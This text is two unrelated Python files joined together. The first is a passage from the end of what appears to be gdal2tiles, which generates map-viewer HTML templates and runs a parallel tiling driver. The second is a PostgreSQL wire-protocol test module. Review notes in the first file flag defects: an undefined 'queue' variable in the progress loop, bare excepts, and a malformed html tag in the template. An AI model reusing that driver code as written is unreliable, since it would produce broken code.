mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom )
);
if (mapBounds.intersects(tileBounds)) {
return zoom+"/"+tile.x+"/"+y+".png";
} else {
return "http://www.maptiler.org/img/none.png";
}
}
// IE 7-: support for PNG alpha channel
// Unfortunately, the opacity for whole overlay is then not changeable, either or...
tilelayer.isPng = function() { return true;};
tilelayer.getOpacity = function() { return opacity; }
overlay = new GTileLayerOverlay( tilelayer );
map.addOverlay(overlay);
map.addControl(new GLargeMapControl());
map.addControl(new GHierarchicalMapTypeControl());
map.addControl(new CTransparencyControl( overlay ));
""" \
        % args
    # Optional Google Earth plugin hookup when KML output is enabled.
    if self.kml:
        s += \
            """
map.addMapType(G_SATELLITE_3D_MAP);
map.getEarthInstance(getEarthInstanceCB);
"""
    s += \
        """
map.enableContinuousZoom();
map.enableScrollWheelZoom();
map.setMapType(G_HYBRID_MAP);
}
resize();
}
"""
    # Callback wiring the generated doc.kml into the Earth plugin.
    if self.kml:
        s += \
            """
function getEarthInstanceCB(object) {
var ge = object;
if (ge) {
var url = document.location.toString();
url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml';
var link = ge.createLink("");
if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") }
else { link.setHref(url) };
var networkLink = ge.createNetworkLink("");
networkLink.setName("TMS Map Overlay");
networkLink.setFlyToView(true);
networkLink.setLink(link);
ge.getFeatures().appendChild(networkLink);
} else {
// alert("You should open a KML in Google Earth");
// add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML?
}
}
""" \
            % args
    s += \
        """
onresize=function(){ resize(); };
//]]>
</script>
</head>
<body onload="load()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.maptiler.org/">MapTiler</a>/<a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
</body>
</html>
""" \
        % args

    return s
# -------------------------------------------------------------------------
    def generate_openlayers(self):
        """
        Template for openlayers.html implementing overlay of available Spherical Mercator layers.
        It returns filled string. Expected variables:
        title, bingkey, north, south, east, west, minzoom, maxzoom, tilesize, tileformat, publishurl
        """
        # Collect the %-substitution values consumed by the template chunks below.
        args = {}
        args['title'] = self.options.title
        args['bingkey'] = self.options.bingkey
        (args['south'], args['west'], args['north'], args['east']) = \
            self.swne
        args['minzoom'] = self.tminz
        args['maxzoom'] = self.tmaxz
        args['tilesize'] = self.tilesize
        args['tileformat'] = self.tileext
        args['publishurl'] = self.options.url
        args['copyright'] = self.options.copyright
        # '-1' shifts the zoom index embedded in tile URLs for TMS-compatible
        # layouts; the empty string leaves the server zoom untouched.
        if self.options.tmscompatible:
            args['tmsoffset'] = '-1'
        else:
            args['tmsoffset'] = ''
        if self.options.profile == 'raster':
            args['rasterzoomlevels'] = self.tmaxz + 1
            args['rastermaxresolution'] = 2 ** self.nativezoom \
                * self.out_gt[1]
        # Static page header and stylesheet, shared by every profile.
        # NOTE(review): the "<html xmlns=...>" tag in the template lacks its
        # closing '>' — confirm against upstream before changing the string.
        s = \
            """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
            <html xmlns="http://www.w3.org/1999/xhtml"
              <head>
                <title>%(title)s</title>
                <meta http-equiv='imagetoolbar' content='no'/>
                <style type="text/css"> v\:* {behavior:url(#default#VML);}
                    html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
                    body { margin: 10px; background: #fff; }
                    h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
                    #header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
                    #subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
                    #map { height: 95%%; border: 1px solid #888; }
                    .olImageLoadError { display: none; }
                    .olControlLayerSwitcher .layersDiv { border-radius: 10px 0 0 10px; }
                </style>""" \
            % args
        # Only the mercator profile needs the Google Maps API script.
        if self.options.profile == 'mercator':
            s += \
                """
            <script src='http://maps.google.com/maps/api/js?sensor=false&v=3.7'></script>""" \
                % args
        s += \
            """
            <script src="http://www.openlayers.org/api/2.12/OpenLayers.js"></script>
            <script>
              var map;
              var mapBounds = new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s);
              var mapMinZoom = %(minzoom)s;
              var mapMaxZoom = %(maxzoom)s;
              var emptyTileURL = "http://www.maptiler.org/img/none.png";
              OpenLayers.IMAGE_RELOAD_ATTEMPTS = 3;
              function init(){""" \
            % args
        # init() body: profile-specific base layers plus the TMS overlay.
        if self.options.profile == 'mercator':
            s += \
                """
                var options = {
                    div: "map",
                    controls: [],
                    projection: "EPSG:900913",
                    displayProjection: new OpenLayers.Projection("EPSG:4326"),
                    numZoomLevels: 20
                };
                map = new OpenLayers.Map(options);
                // Create Google Mercator layers
                var gmap = new OpenLayers.Layer.Google("Google Streets",
                {
                    type: google.maps.MapTypeId.ROADMAP,
                    sphericalMercator: true
                });
                var gsat = new OpenLayers.Layer.Google("Google Satellite",
                {
                    type: google.maps.MapTypeId.SATELLITE,
                    sphericalMercator: true
                });
                var ghyb = new OpenLayers.Layer.Google("Google Hybrid",
                {
                    type: google.maps.MapTypeId.HYBRID,
                    sphericalMercator: true
                });
                var gter = new OpenLayers.Layer.Google("Google Terrain",
                {
                    type: google.maps.MapTypeId.TERRAIN,
                    sphericalMercator: true
                });
                // Create Bing layers
                var broad = new OpenLayers.Layer.Bing({
                    name: "Bing Roads",
                    key: "%(bingkey)s",
                    type: "Road",
                    sphericalMercator: true
                });
                var baer = new OpenLayers.Layer.Bing({
                    name: "Bing Aerial",
                    key: "%(bingkey)s",
                    type: "Aerial",
                    sphericalMercator: true
                });
                var bhyb = new OpenLayers.Layer.Bing({
                    name: "Bing Hybrid",
                    key: "%(bingkey)s",
                    type: "AerialWithLabels",
                    sphericalMercator: true
                });
                // Create OSM layer
                var osm = new OpenLayers.Layer.OSM("OpenStreetMap");
                // create TMS Overlay layer
                var tmsoverlay = new OpenLayers.Layer.TMS( "TMS Overlay", "",
                {
                    serviceVersion: '.',
                    layername: '.',
                    alpha: true,
                    type: '%(tileformat)s',
                    isBaseLayer: false,
                    getURL: getURL
                });
                if (OpenLayers.Util.alphaHack() == false) {
                    tmsoverlay.setOpacity(0.7);
                }
                map.addLayers([gmap, gsat, ghyb, gter,
                               broad, baer, bhyb,
                               osm, tmsoverlay]);
                var switcherControl = new OpenLayers.Control.LayerSwitcher();
                map.addControl(switcherControl);
                switcherControl.maximizeControl();
                map.zoomToExtent( mapBounds.transform(map.displayProjection, map.projection ) );
                """ \
                % args
        elif self.options.profile == 'geodetic':
            s += \
                """
                var options = {
                    div: "map",
                    controls: [],
                    projection: "EPSG:4326"
                };
                map = new OpenLayers.Map(options);
                var wms = new OpenLayers.Layer.WMS("VMap0",
                    "http://tilecache.osgeo.org/wms-c/Basic.py?",
                    {
                        layers: 'basic',
                        format: 'image/png'
                    }
                );
                var tmsoverlay = new OpenLayers.Layer.TMS( "TMS Overlay", "",
                {
                    serviceVersion: '.',
                    layername: '.',
                    alpha: true,
                    type: '%(tileformat)s',
                    isBaseLayer: false,
                    getURL: getURL
                });
                if (OpenLayers.Util.alphaHack() == false) {
                    tmsoverlay.setOpacity(0.7);
                }
                map.addLayers([wms,tmsoverlay]);
                var switcherControl = new OpenLayers.Control.LayerSwitcher();
                map.addControl(switcherControl);
                switcherControl.maximizeControl();
                map.zoomToExtent( mapBounds );
                """ \
                % args
        elif self.options.profile == 'raster':
            s += \
                """
                var options = {
                    div: "map",
                    controls: [],
                    maxExtent: new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s ),
                    maxResolution: %(rastermaxresolution)f,
                    numZoomLevels: %(rasterzoomlevels)d
                };
                map = new OpenLayers.Map(options);
                var layer = new OpenLayers.Layer.TMS( "TMS Layer","",
                {
                    serviceVersion: '.',
                    layername: '.',
                    alpha: true,
                    type: '%(tileformat)s',
                    getURL: getURL
                });
                map.addLayer(layer);
                map.zoomToExtent( mapBounds );
                """ \
                % args
        s += \
            """
                map.addControls([new OpenLayers.Control.PanZoomBar(),
                                 new OpenLayers.Control.Navigation(),
                                 new OpenLayers.Control.MousePosition(),
                                 new OpenLayers.Control.ArgParser(),
                                 new OpenLayers.Control.Attribution()]);
              }
              """ \
            % args
        # getURL(): per-profile resolver turning OpenLayers bounds into a tile path.
        if self.options.profile == 'mercator':
            s += \
                """
              function getURL(bounds) {
                  bounds = this.adjustBounds(bounds);
                  var res = this.getServerResolution();
                  var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
                  var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
                  var z = this.getServerZoom();
                  if (this.map.baseLayer.CLASS_NAME === 'OpenLayers.Layer.Bing') {
                      z+=1;
                  }
                  var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
                  var url = this.url;
                  if (OpenLayers.Util.isArray(url)) {
                      url = this.selectUrl(path, url);
                  }
                  if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
                      return url + path;
                  } else {
                      return emptyTileURL;
                  }
              }
              """ \
                % args
        elif self.options.profile == 'geodetic':
            s += \
                """
              function getURL(bounds) {
                  bounds = this.adjustBounds(bounds);
                  var res = this.getServerResolution();
                  var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
                  var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
                  var z = this.getServerZoom()%(tmsoffset)s;
                  var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
                  var url = this.url;
                  if (OpenLayers.Util.isArray(url)) {
                      url = this.selectUrl(path, url);
                  }
                  if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
                      return url + path;
                  } else {
                      return emptyTileURL;
                  }
              }
              """ \
                % args
        elif self.options.profile == 'raster':
            s += \
                """
              function getURL(bounds) {
                  bounds = this.adjustBounds(bounds);
                  var res = this.getServerResolution();
                  var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tileSize.w));
                  var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tileSize.h));
                  var z = this.getServerZoom();
                  var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
                  var url = this.url;
                  if (OpenLayers.Util.isArray(url)) {
                      url = this.selectUrl(path, url);
                  }
                  if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
                      return url + path;
                  } else {
                      return emptyTileURL;
                  }
              }
              """ \
                % args
        # Shared window-sizing helpers, resize handler, and the page body.
        s += \
            """
              function getWindowHeight() {
                  if (self.innerHeight) return self.innerHeight;
                  if (document.documentElement && document.documentElement.clientHeight)
                      return document.documentElement.clientHeight;
                  if (document.body) return document.body.clientHeight;
                  return 0;
              }
              function getWindowWidth() {
                  if (self.innerWidth) return self.innerWidth;
                  if (document.documentElement && document.documentElement.clientWidth)
                      return document.documentElement.clientWidth;
                  if (document.body) return document.body.clientWidth;
                  return 0;
              }
              function resize() {
                  var map = document.getElementById("map");
                  var header = document.getElementById("header");
                  var subheader = document.getElementById("subheader");
                  map.style.height = (getWindowHeight()-80) + "px";
                  map.style.width = (getWindowWidth()-20) + "px";
                  header.style.width = (getWindowWidth()-20) + "px";
                  subheader.style.width = (getWindowWidth()-20) + "px";
                  if (map.updateSize) { map.updateSize(); };
              }
              onresize=function(){ resize(); };
            </script>
          </head>
          <body onload="init()">
            <div id="header"><h1>%(title)s</h1></div>
            <div id="subheader">Generated by <a href="http://www.maptiler.org/">MapTiler</a>/<a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright &copy; 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> &amp; <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
            <!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
            </div>
            <div id="map"></div>
            <script type="text/javascript" >resize()</script>
          </body>
        </html>""" \
            % args
        return s
# =============================================================================
# =============================================================================
# =============================================================================
def worker_metadata(argv):
    """Subprocess entry point: parse options, open the input, emit metadata only."""
    tiler = GDAL2Tiles(argv[1:])
    tiler.open_input()
    tiler.generate_metadata()
def worker_base_tiles(argv, cpu):
    """Subprocess entry point: render this `cpu`'s share of the base-zoom tiles."""
    tiler = GDAL2Tiles(argv[1:])
    tiler.open_input()
    tiler.generate_base_tiles(cpu)
def worker_overview_tiles(argv, cpu, tz):
    """Subprocess entry point: render this `cpu`'s share of overview tiles at zoom `tz`."""
    tiler = GDAL2Tiles(argv[1:])
    tiler.open_input()
    tiler.generate_overview_tiles(cpu, tz)
# Parallel driver: forks one process for metadata, then fans out tile
# generation over a multiprocessing.Pool, one task per configured process.
# NOTE: this is Python 2 code (`print` statements below).
if __name__ == '__main__':
    argv = gdal.GeneralCmdLineProcessor(sys.argv)
    if argv:
        gdal2tiles = GDAL2Tiles(argv[1:]) # handle command line options
        # Metadata is produced once, in its own process, before any tiles.
        p = multiprocessing.Process(target=worker_metadata, args=[argv])
        p.start()
        p.join()
        pool = multiprocessing.Pool()
        processed_tiles = 0
        print 'Generating Base Tiles:'
        for cpu in range(gdal2tiles.options.processes):
            pool.apply_async(worker_base_tiles, [argv, cpu])
        pool.close()
        # Poll workers for progress reports until they all exit.
        # NOTE(review): `queue` is not defined anywhere in this scope —
        # presumably a multiprocessing queue created elsewhere; confirm.
        while len(multiprocessing.active_children()) != 0:
            try:
                total = queue.get(timeout=1)
                processed_tiles += 1
                gdal.TermProgress_nocb(processed_tiles / float(total))
                sys.stdout.flush()
            # NOTE(review): bare except also swallows KeyboardInterrupt.
            except:
                pass
        pool.join()
        processed_tiles = 0
        print 'Generating Overview Tiles:'
        # Overviews are built top-down, one pool per zoom level.
        for tz in range(gdal2tiles.tmaxz - 1, gdal2tiles.tminz - 1, -1):
            pool = multiprocessing.Pool()
            for cpu in range(gdal2tiles.options.processes):
                pool.apply_async(worker_overview_tiles, [argv, cpu, tz])
            pool.close()
            while len(multiprocessing.active_children()) != 0:
                try:
                    total = queue.get(timeout=1)
                    processed_tiles += 1
                    gdal.TermProgress_nocb(processed_tiles
                            / float(total))
                    sys.stdout.flush()
                except:
                    pass
            pool.join()
#############
# vim:noet
#############
|
test_protocol.py | ##
# .test.test_protocol
##
import sys
import unittest
import struct
import decimal
import socket
import time
from threading import Thread
from ..protocol import element3 as e3
from ..protocol import xact3 as x3
from ..protocol import client3 as c3
from ..protocol import buffer as pq_buf
from ..python.socket import find_available_port, SocketFactory
def pair(msg):
	# Collapse a protocol message to its wire form: (type code, payload bytes).
	return msg.type, msg.serialize()
def pairs(*msgseq):
	# pair() applied across an argument list of messages.
	return [pair(m) for m in msgseq]
# Pre-compiled codec for the protocol's 4-byte big-endian unsigned length word.
# NOTE(review): `long` shadows the Python 2 builtin of the same name; harmless
# on Python 3 but an unfortunate choice.
long = struct.Struct("!L")
packl = long.pack
unpackl = long.unpack
class test_buffer(unittest.TestCase):
	# Exercises pq_buf.pq_message_stream: incremental framing of messages
	# shaped <type byte><4-byte big-endian self-inclusive length><payload>.
	# next_message() yields None until a complete message has been buffered.
	def setUp(self):
		self.buffer = pq_buf.pq_message_stream()
	def testMultiByteMessage(self):
		# Length 0x10 = 16 bytes total: 4 length bytes + 12 payload bytes.
		b = self.buffer
		b.write(b's')
		self.assertTrue(b.next_message() is None)
		b.write(b'\x00\x00')
		self.assertTrue(b.next_message() is None)
		b.write(b'\x00\x10')
		self.assertTrue(b.next_message() is None)
		data = b'twelve_chars'
		b.write(data)
		self.assertEqual(b.next_message(), (b's', data))
	def testSingleByteMessage(self):
		# Length 5 -> exactly one payload byte after the length word.
		b = self.buffer
		b.write(b's')
		self.assertTrue(b.next_message() is None)
		b.write(b'\x00')
		self.assertTrue(b.next_message() is None)
		b.write(b'\x00\x00\x05')
		self.assertTrue(b.next_message() is None)
		b.write(b'b')
		self.assertEqual(b.next_message(), (b's', b'b'))
	def testEmptyMessage(self):
		# Length 4 -> header only, empty payload.
		b = self.buffer
		b.write(b'x')
		self.assertTrue(b.next_message() is None)
		b.write(b'\x00\x00\x00')
		self.assertTrue(b.next_message() is None)
		b.write(b'\x04')
		self.assertEqual(b.next_message(), (b'x', b''))
	def testInvalidLength(self):
		# Lengths below 4 are impossible (the field counts itself).
		b = self.buffer
		b.write(b'y\x00\x00\x00\x03')
		self.assertRaises(ValueError, b.next_message,)
	def testRemainder(self):
		# Bytes beyond the declared length must stay buffered for later.
		b = self.buffer
		b.write(b'r\x00\x00\x00\x05Aremainder')
		self.assertEqual(b.next_message(), (b'r', b'A'))
	def testLarge(self):
		# Reassembly of a ~10MB message written in 1KB segments.
		b = self.buffer
		factor = 1024
		r = 10000
		b.write(b'X' + packl(factor * r + 4))
		segment = b'\x00' * factor
		for x in range(r-1):
			b.write(segment)
		b.write(segment)
		msg = b.next_message()
		self.assertTrue(msg is not None)
		self.assertEqual(msg[0], b'X')
	def test_getvalue(self):
		# Make sure that getvalue() only applies to messages
		# that have not been read.
		b = self.buffer
		# It should be empty.
		self.assertEqual(b.getvalue(), b'')
		d = b'F' + packl(28)
		b.write(d)
		self.assertEqual(b.getvalue(), d)
		d1 = b'01'*12 # 24
		b.write(d1)
		self.assertEqual(b.getvalue(), d + d1)
		out = b.read()[0]
		self.assertEqual(out, (b'F', d1))
		nd = b'N'
		b.write(nd)
		self.assertEqual(b.getvalue(), nd)
		b.write(packl(4))
		self.assertEqual(list(b.read()), [(b'N', b'')])
		self.assertEqual(b.getvalue(), b'')
		# partial; read one message to exercise
		# that the appropriate fragment of the first
		# chunk in the buffer is picked up.
		first_body = (b'1234' * 3)
		first = b'v' + packl(len(first_body) + 4) + first_body
		second_body = (b'4321' * 5)
		second = b'z' + packl(len(second_body) + 4) + second_body
		b.write(first + second)
		self.assertEqual(b.getvalue(), first + second)
		self.assertEqual(list(b.read(1)), [(b'v', first_body)])
		self.assertEqual(b.getvalue(), second)
		self.assertEqual(list(b.read(1)), [(b'z', second_body)])
		# now, with a third full message in the next chunk
		third_body = (b'9876' * 10)
		third = b'3' + packl(len(third_body) + 4) + third_body
		b.write(first + second)
		b.write(third)
		self.assertEqual(b.getvalue(), first + second + third)
		self.assertEqual(list(b.read(1)), [(b'v', first_body)])
		self.assertEqual(b.getvalue(), second + third)
		self.assertEqual(list(b.read(1)), [(b'z', second_body)])
		self.assertEqual(b.getvalue(), third)
		self.assertEqual(list(b.read(1)), [(b'3', third_body)])
		self.assertEqual(b.getvalue(), b'')
##
# element3 tests
##
# One instance of (nearly) every element3 message type, used by
# test_element3.testSerializeParseConsistency to round-trip
# parse(serialize(msg)) == msg.
message_samples = [
	e3.VoidMessage,
	e3.Startup([
		(b'user', b'jwp'),
		(b'database', b'template1'),
		(b'options', b'-f'),
	]),
	e3.Notice((
		(b'S', b'FATAL'),
		(b'M', b'a descriptive message'),
		(b'C', b'FIVEC'),
		(b'D', b'bleh'),
		(b'H', b'dont spit into the fan'),
	)),
	e3.Notify(123, b'wood_table'),
	e3.KillInformation(19320, 589483),
	e3.ShowOption(b'foo', b'bar'),
	e3.Authentication(4, b'salt'),
	e3.Complete(b'SELECT'),
	e3.Ready(b'I'),
	e3.CancelRequest(4123, 14252),
	e3.NegotiateSSL(),
	e3.Password(b'ckr4t'),
	e3.AttributeTypes(()),
	e3.AttributeTypes(
		(123,) * 1
	),
	e3.AttributeTypes(
		(123,0) * 1
	),
	e3.AttributeTypes(
		(123,0) * 2
	),
	e3.AttributeTypes(
		(123,0) * 4
	),
	e3.TupleDescriptor(()),
	e3.TupleDescriptor((
		(b'name', 123, 1, 1, 0, 0, 1,),
	)),
	e3.TupleDescriptor((
		(b'name', 123, 1, 2, 0, 0, 1,),
	) * 2),
	e3.TupleDescriptor((
		(b'name', 123, 1, 2, 1, 0, 1,),
	) * 3),
	e3.TupleDescriptor((
		(b'name', 123, 1, 1, 0, 0, 1,),
	) * 1000),
	e3.Tuple([]),
	e3.Tuple([b'foo',]),
	e3.Tuple([None]),
	e3.Tuple([b'foo',b'bar']),
	e3.Tuple([None, None]),
	e3.Tuple([None, b'foo', None]),
	e3.Tuple([b'bar', None, b'foo', None, b'bleh']),
	e3.Tuple([b'foo', b'bar'] * 100),
	e3.Tuple([None] * 100),
	e3.Query(b'select * from u'),
	e3.Parse(b'statement_id', b'query', (123, 0)),
	e3.Parse(b'statement_id', b'query', (123,)),
	e3.Parse(b'statement_id', b'query', ()),
	e3.Bind(b'portal_id', b'statement_id',
		(b'tt',b'\x00\x00'),
		[b'data',None], (b'ff',b'xx')),
	e3.Bind(b'portal_id', b'statement_id', (b'tt',), [None], (b'xx',)),
	e3.Bind(b'portal_id', b'statement_id', (b'ff',), [b'data'], ()),
	e3.Bind(b'portal_id', b'statement_id', (), [], (b'xx',)),
	e3.Bind(b'portal_id', b'statement_id', (), [], ()),
	e3.Execute(b'portal_id', 500),
	e3.Execute(b'portal_id', 0),
	e3.DescribeStatement(b'statement_id'),
	e3.DescribePortal(b'portal_id'),
	e3.CloseStatement(b'statement_id'),
	e3.ClosePortal(b'portal_id'),
	e3.Function(123, (), [], b'xx'),
	e3.Function(321, (b'tt',), [b'foo'], b'xx'),
	e3.Function(321, (b'tt',), [None], b'xx'),
	e3.Function(321, (b'aa', b'aa'), [None,b'a' * 200], b'xx'),
	e3.FunctionResult(b''),
	e3.FunctionResult(b'foobar'),
	e3.FunctionResult(None),
	e3.CopyToBegin(123, [321,123]),
	e3.CopyToBegin(0, [10,]),
	e3.CopyToBegin(123, []),
	e3.CopyFromBegin(123, [321,123]),
	e3.CopyFromBegin(0, [10]),
	e3.CopyFromBegin(123, []),
	e3.CopyData(b''),
	e3.CopyData(b'foo'),
	e3.CopyData(b'a' * 2048),
	e3.CopyFail(b''),
	e3.CopyFail(b'iiieeeeee!'),
]
class test_element3(unittest.TestCase):
	def test_cat_messages(self):
		# The optimized implementation will identify adjacent copy data, and
		# take a more efficient route; so rigorously test the switch between the
		# two modes.
		self.assertEqual(e3.cat_messages([]), b'')
		self.assertEqual(e3.cat_messages([b'foo']), b'd\x00\x00\x00\x07foo')
		self.assertEqual(e3.cat_messages([b'foo', b'foo']), 2*b'd\x00\x00\x00\x07foo')
		# copy, other, copy
		self.assertEqual(e3.cat_messages([b'foo', e3.SynchronizeMessage, b'foo']),
			b'd\x00\x00\x00\x07foo' + e3.SynchronizeMessage.bytes() + b'd\x00\x00\x00\x07foo')
		# copy, other, copy*1000
		self.assertEqual(e3.cat_messages(1000*[b'foo', e3.SynchronizeMessage, b'foo']),
			1000*(b'd\x00\x00\x00\x07foo' + e3.SynchronizeMessage.bytes() + b'd\x00\x00\x00\x07foo'))
		# other, copy, copy*1000
		self.assertEqual(e3.cat_messages(1000*[e3.SynchronizeMessage, b'foo', b'foo']),
			1000*(e3.SynchronizeMessage.bytes() + 2*b'd\x00\x00\x00\x07foo'))
		pack_head = struct.Struct("!lH").pack
		# tuple
		self.assertEqual(e3.cat_messages([(b'foo',),]),
			b'D' + pack_head(7 + 4 + 2, 1) + b'\x00\x00\x00\x03foo')
		# tuple(foo,\N)  (0xFFFFFFFF length marks a NULL attribute)
		self.assertEqual(e3.cat_messages([(b'foo',None,),]),
			b'D' + pack_head(7 + 4 + 4 + 2, 2) + b'\x00\x00\x00\x03foo\xFF\xFF\xFF\xFF')
		# tuple(foo,\N,bar)
		self.assertEqual(e3.cat_messages([(b'foo',None,b'bar'),]),
			b'D' + pack_head(7 + 7 + 4 + 4 + 2, 3) + \
			b'\x00\x00\x00\x03foo\xFF\xFF\xFF\xFF\x00\x00\x00\x03bar')
		# too many attributes
		self.assertRaises((OverflowError, struct.error),
			e3.cat_messages, [(None,) * 0x10000])
		class ThisEx(Exception):
			pass
		class ThatEx(Exception):
			pass
		# Errors raised by serialize() must propagate out of cat_messages.
		class Bad(e3.Message):
			def serialize(self):
				raise ThisEx('foo')
		self.assertRaises(ThisEx, e3.cat_messages, [Bad()])
		class NoType(e3.Message):
			def serialize(self):
				return b''
		self.assertRaises(AttributeError, e3.cat_messages, [NoType()])
		class BadType(e3.Message):
			type = 123
			def serialize(self):
				return b''
		self.assertRaises((TypeError,struct.error), e3.cat_messages, [BadType()])
	def testSerializeParseConsistency(self):
		# Round-trip every sample: parse(serialize(msg)) == msg.
		for msg in message_samples:
			smsg = msg.serialize()
			self.assertEqual(msg, msg.parse(smsg))
	def testEmptyMessages(self):
		# EmptyMessage instances are singletons: type() re-yields the instance.
		for x in e3.__dict__.values():
			if isinstance(x, e3.EmptyMessage):
				xtype = type(x)
				self.assertTrue(x is xtype())
	def testUnknownNoticeFields(self):
		# Unknown field codes ('Z', 'X') must be preserved, not dropped.
		N = e3.Notice.parse(b'\x00\x00Z\x00Xklsvdnvldsvkndvlsn\x00Pfoobar\x00Mmessage\x00')
		E = e3.Error.parse(b'Z\x00Xklsvdnvldsvkndvlsn\x00Pfoobar\x00Mmessage\x00\x00')
		self.assertEqual(N[b'M'], b'message')
		self.assertEqual(E[b'M'], b'message')
		self.assertEqual(N[b'P'], b'foobar')
		self.assertEqual(E[b'P'], b'foobar')
		self.assertEqual(len(N), 4)
		self.assertEqual(len(E), 4)
	def testCompleteExtracts(self):
		# extract_command()/extract_count() split a command-completion tag
		# into its textual command and trailing row count.
		x = e3.Complete(b'FOO BAR 1321')
		self.assertEqual(x.extract_command(), b'FOO BAR')
		self.assertEqual(x.extract_count(), 1321)
		x = e3.Complete(b' CREATE TABLE 13210 ')
		self.assertEqual(x.extract_command(), b'CREATE TABLE')
		self.assertEqual(x.extract_count(), 13210)
		x = e3.Complete(b' CREATE TABLE \t713210 ')
		self.assertEqual(x.extract_command(), b'CREATE TABLE')
		self.assertEqual(x.extract_count(), 713210)
		x = e3.Complete(b' CREATE TABLE 0 \t13210 ')
		self.assertEqual(x.extract_command(), b'CREATE TABLE')
		self.assertEqual(x.extract_count(), 13210)
		x = e3.Complete(b' 0 \t13210 ')
		self.assertEqual(x.extract_command(), None)
		self.assertEqual(x.extract_count(), 13210)
##
# .protocol.xact3 tests
##
# (client messages, expected server replies) pairs driven through
# x3.Instruction by test_xact3.testTransactionSamplesAll below.
xact_samples = [
	# Simple contrived exchange.
	(
		(
			e3.Query(b"COMPLETE"),
		), (
			e3.Complete(b'COMPLETE'),
			e3.Ready(b'I'),
		)
	),
	(
		(
			e3.Query(b"ROW DATA"),
		), (
			e3.TupleDescriptor((
				(b'foo', 1, 1, 1, 1, 1, 1),
				(b'bar', 1, 2, 1, 1, 1, 1),
			)),
			e3.Tuple((b'lame', b'lame')),
			e3.Complete(b'COMPLETE'),
			e3.Ready(b'I'),
		)
	),
	(
		(
			e3.Query(b"ROW DATA"),
		), (
			e3.TupleDescriptor((
				(b'foo', 1, 1, 1, 1, 1, 1),
				(b'bar', 1, 2, 1, 1, 1, 1),
			)),
			e3.Tuple((b'lame', b'lame')),
			e3.Tuple((b'lame', b'lame')),
			e3.Tuple((b'lame', b'lame')),
			e3.Tuple((b'lame', b'lame')),
			e3.Ready(b'I'),
		)
	),
	(
		(
			e3.Query(b"NULL"),
		), (
			e3.Null(),
			e3.Ready(b'I'),
		)
	),
	(
		(
			e3.Query(b"COPY TO"),
		), (
			e3.CopyToBegin(1, [1,2]),
			e3.CopyData(b'row1'),
			e3.CopyData(b'row2'),
			e3.CopyDone(),
			e3.Complete(b'COPY TO'),
			e3.Ready(b'I'),
		)
	),
	(
		(
			e3.Function(1, [b''], [b''], 1),
		), (
			e3.FunctionResult(b'foo'),
			e3.Ready(b'I'),
		)
	),
	(
		(
			e3.Parse(b"NAME", b"SQL", ()),
		), (
			e3.ParseComplete(),
		)
	),
	(
		(
			e3.Bind(b"NAME", b"STATEMENT_ID", (), (), ()),
		), (
			e3.BindComplete(),
		)
	),
	(
		(
			e3.Parse(b"NAME", b"SQL", ()),
			e3.Bind(b"NAME", b"STATEMENT_ID", (), (), ()),
		), (
			e3.ParseComplete(),
			e3.BindComplete(),
		)
	),
	(
		(
			e3.Describe(b"STATEMENT_ID"),
		), (
			e3.AttributeTypes(()),
			e3.NoData(),
		)
	),
	(
		(
			e3.Describe(b"STATEMENT_ID"),
		), (
			e3.AttributeTypes(()),
			e3.TupleDescriptor(()),
		)
	),
	(
		(
			e3.CloseStatement(b"foo"),
		), (
			e3.CloseComplete(),
		),
	),
	(
		(
			e3.ClosePortal(b"foo"),
		), (
			e3.CloseComplete(),
		),
	),
	(
		(
			e3.Synchronize(),
		), (
			e3.Ready(b'I'),
		),
	),
]
class test_xact3(unittest.TestCase):
	def testTransactionSamplesAll(self):
		# Drive every sample exchange through Instruction: send, feed the
		# serialized replies, and check the reconstructed message stream.
		for xcmd, xres in xact_samples:
			x = x3.Instruction(xcmd)
			r = tuple([(y.type, y.serialize()) for y in xres])
			x.state[1]()
			self.assertEqual(x.messages, ())
			x.state[1](r)
